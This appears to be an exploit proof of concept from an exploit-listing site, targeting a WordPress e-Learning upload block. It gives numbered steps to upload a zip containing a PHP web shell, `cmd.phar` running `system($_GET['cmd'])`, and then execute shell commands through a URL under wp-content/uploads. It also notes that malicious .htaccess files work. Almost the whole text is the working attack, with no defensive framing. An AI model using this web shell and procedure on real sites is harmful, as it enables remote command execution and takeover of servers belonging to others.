## https://sploitus.com/exploit?id=WPEX-ID:ECCD017C-E442-46B6-B5E6-AEC7BBD5F836
Note: This must be tested on a web server running Apache
1) Create a new post
2) Add e-Learning block to the post and upload a zip file containing a blank HTML file (e.g. `main.html`) and a Phar filed with the name `cmd.phar`). In `cmd.phar`, add the contents `<?php echo system($_GET['cmd']); ?>`. Malicious .htaccess files works too.
3) After uploading, browse to http://example.com//wp-content/uploads/articulate_uploads/__ZIP_NAME_HERE__/cmd.phar?cmd=ls
4) You will see a listing of contents using the `ls` command